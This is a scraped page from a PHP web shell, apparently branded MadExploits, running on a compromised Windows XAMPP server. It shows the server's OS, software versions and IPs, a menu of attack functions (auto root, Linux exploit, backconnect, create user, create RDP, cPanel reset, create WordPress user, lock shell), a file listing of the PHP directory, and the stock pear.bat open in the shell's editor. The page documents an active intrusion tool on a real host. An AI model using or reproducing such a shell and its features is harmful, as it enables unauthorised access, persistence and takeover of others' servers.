Windows NT DESKTOP-F6O892L 6.2 build 9200 (Windows 8 Professional Edition) i586
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.19
: 10.220.0.88 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
5.6.19
SC-SRV
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ E ]
D: /
xampp /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
CompatInfo
[ DIR ]
drwxrwxrwx
cfg
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
dev
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
ext
[ DIR ]
drwxrwxrwx
extras
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
man
[ DIR ]
drwxrwxrwx
pear
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
www
[ DIR ]
drwxrwxrwx
CompatInfo.php
17.91
KB
-rw-rw-rw-
deplister.exe
56
KB
-rwxrwxrwx
glib-2.dll
1.04
MB
-rw-rw-rw-
gmodule-2.dll
14
KB
-rw-rw-rw-
icudt56.dll
23.89
MB
-rw-rw-rw-
icuin56.dll
1.74
MB
-rw-rw-rw-
icuio56.dll
41
KB
-rw-rw-rw-
icule56.dll
211.5
KB
-rw-rw-rw-
iculx56.dll
41
KB
-rw-rw-rw-
icutest55.dll
55
KB
-rw-rw-rw-
icutu55.dll
159.5
KB
-rw-rw-rw-
icuuc56.dll
1.13
MB
-rw-rw-rw-
install.txt
77.55
KB
-rw-rw-rw-
libeay32.dll
1.25
MB
-rw-rw-rw-
libenchant.dll
34.5
KB
-rw-rw-rw-
libpq.dll
127
KB
-rw-rw-rw-
libsasl.dll
209.5
KB
-rw-rw-rw-
libssh2.dll
224
KB
-rw-rw-rw-
license.txt
3.21
KB
-rw-rw-rw-
msvcp110.dll
522.47
KB
-rw-rw-rw-
msvcr110.dll
854.95
KB
-rw-rw-rw-
news.txt
519.91
KB
-rw-rw-rw-
pci
527
B
-rw-rw-rw-
pci.bat
568
B
-rwxrwxrwx
pci.css
1.23
KB
-rw-rw-rw-
pciconf
17.1
KB
-rw-rw-rw-
pciconf.bat
561
B
-rwxrwxrwx
pear.bat
4.26
KB
-rwxrwxrwx
peardev.bat
4.61
KB
-rwxrwxrwx
pecl.bat
4.55
KB
-rwxrwxrwx
phar.phar.bat
43
B
-rwxrwxrwx
pharcommand.phar
51.99
KB
-rw-rw-rw-
php-cgi.exe
49
KB
-rwxrwxrwx
php-win.exe
28
KB
-rwxrwxrwx
php.exe
65.5
KB
-rwxrwxrwx
php.gif
2.46
KB
-rw-rw-rw-
php.ini
73.84
KB
-rw-rw-rw-
php.ini-development
72.48
KB
-rw-rw-rw-
php.ini-production
72.51
KB
-rw-rw-rw-
php5apache2_4.dll
26.5
KB
-rw-rw-rw-
php5embed.lib
842.18
KB
-rw-rw-rw-
php5phpdbg.dll
142.5
KB
-rw-rw-rw-
php5ts.dll
6.79
MB
-rw-rw-rw-
phpdbg.exe
152.5
KB
-rwxrwxrwx
phpunit
2.05
KB
-rw-rw-rw-
phpunit.bat
1.91
KB
-rwxrwxrwx
readme-redist-bins.txt
20.86
KB
-rw-rw-rw-
snapshot.txt
3.54
KB
-rw-rw-rw-
ssleay32.dll
248.5
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pear.bat
@ECHO OFF REM ---------------------------------------------------------------------- REM PHP version 5 REM ---------------------------------------------------------------------- REM Copyright (c) 1997-2010 The Authors REM ---------------------------------------------------------------------- REM http://opensource.org/licenses/bsd-license.php New BSD License REM ---------------------------------------------------------------------- REM Authors: Alexander Merz (alexmerz@php.net) REM ---------------------------------------------------------------------- REM REM Last updated 12/29/2004 ($Id$ is not replaced if the file is binary) REM change this lines to match the paths of your system REM ------------------- REM Test to see if this is a raw pear.bat (uninstalled version) SET TMPTMPTMPTMPT=@includ SET PMTPMTPMT=%TMPTMPTMPTMPT%e_path@ FOR %%x IN ("D:\xampp\php\pear") DO (if %%x=="%PMTPMTPMT%" GOTO :NOTINSTALLED) REM Check PEAR global ENV, set them if they do not exist IF "%PHP_PEAR_INSTALL_DIR%"=="" SET "PHP_PEAR_INSTALL_DIR=D:\xampp\php\pear" IF "%PHP_PEAR_BIN_DIR%"=="" SET "PHP_PEAR_BIN_DIR=D:\xampp\php" IF "%PHP_PEAR_PHP_BIN%"=="" SET "PHP_PEAR_PHP_BIN=D:\xampp\php\php.exe" GOTO :INSTALLED :NOTINSTALLED ECHO WARNING: This is a raw, uninstalled pear.bat REM Check to see if we can grab the directory of this file (Windows NT+) IF %~n0 == pear ( FOR %%x IN (cli\php.exe php.exe) DO (if "%%~$PATH:x" NEQ "" ( SET "PHP_PEAR_PHP_BIN=%%~$PATH:x" echo Using PHP Executable "%PHP_PEAR_PHP_BIN%" "%PHP_PEAR_PHP_BIN%" -v GOTO :NEXTTEST )) GOTO :FAILAUTODETECT :NEXTTEST IF "%PHP_PEAR_PHP_BIN%" NEQ "" ( REM We can use this PHP to run a temporary php file to get the dirname of pear echo ^<?php $s=getcwd^(^);chdir^($a=dirname^(__FILE__^).'\\'^);if^(stristr^($a,'\\scripts'^)^)$a=dirname^(dirname^($a^)^).'\\';$f=fopen^($s.'\\~a.a','wb'^);echo$s.'\\~a.a';fwrite^($f,$a^);fclose^($f^);chdir^($s^);?^> > ~~getloc.php "%PHP_PEAR_PHP_BIN%" ~~getloc.php set /p PHP_PEAR_BIN_DIR=fakeprompt < ~a.a DEL ~a.a DEL ~~getloc.php set "PHP_PEAR_INSTALL_DIR=%PHP_PEAR_BIN_DIR%pear" REM Make sure there is a pearcmd.php at our disposal IF NOT EXIST %PHP_PEAR_INSTALL_DIR%\pearcmd.php ( IF EXIST %PHP_PEAR_INSTALL_DIR%\scripts\pearcmd.php COPY %PHP_PEAR_INSTALL_DIR%\scripts\pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php IF EXIST pearcmd.php COPY pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php IF EXIST %~dp0\scripts\pearcmd.php COPY %~dp0\scripts\pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php ) ) GOTO :INSTALLED ) ELSE ( REM Windows Me/98 cannot succeed, so allow the batch to fail ) :FAILAUTODETECT echo WARNING: failed to auto-detect pear information :INSTALLED REM Check Folders and files IF NOT EXIST "%PHP_PEAR_INSTALL_DIR%" GOTO PEAR_INSTALL_ERROR IF NOT EXIST "%PHP_PEAR_INSTALL_DIR%\pearcmd.php" GOTO PEAR_INSTALL_ERROR2 IF NOT EXIST "%PHP_PEAR_BIN_DIR%" GOTO PEAR_BIN_ERROR IF NOT EXIST "%PHP_PEAR_PHP_BIN%" GOTO PEAR_PHPBIN_ERROR REM launch pearcmd GOTO RUN :PEAR_INSTALL_ERROR ECHO PHP_PEAR_INSTALL_DIR is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_INSTALL_DIR% GOTO END :PEAR_INSTALL_ERROR2 ECHO PHP_PEAR_INSTALL_DIR is not set correctly. ECHO pearcmd.php could not be found there. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_INSTALL_DIR% GOTO END :PEAR_BIN_ERROR ECHO PHP_PEAR_BIN_DIR is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_BIN_DIR% GOTO END :PEAR_PHPBIN_ERROR ECHO PHP_PEAR_PHP_BIN is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_PHP_BIN% GOTO END :RUN "%PHP_PEAR_PHP_BIN%" -C -d date.timezone=UTC -d output_buffering=1 -d safe_mode=0 -d open_basedir="" -d auto_prepend_file="" -d auto_append_file="" -d variables_order=EGPCS -d register_argc_argv="On" -d "include_path='%PHP_PEAR_INSTALL_DIR%'" -f "%PHP_PEAR_INSTALL_DIR%\pearcmd.php" -- %1 %2 %3 %4 %5 %6 %7 %8 %9 :END @ECHO ON
Close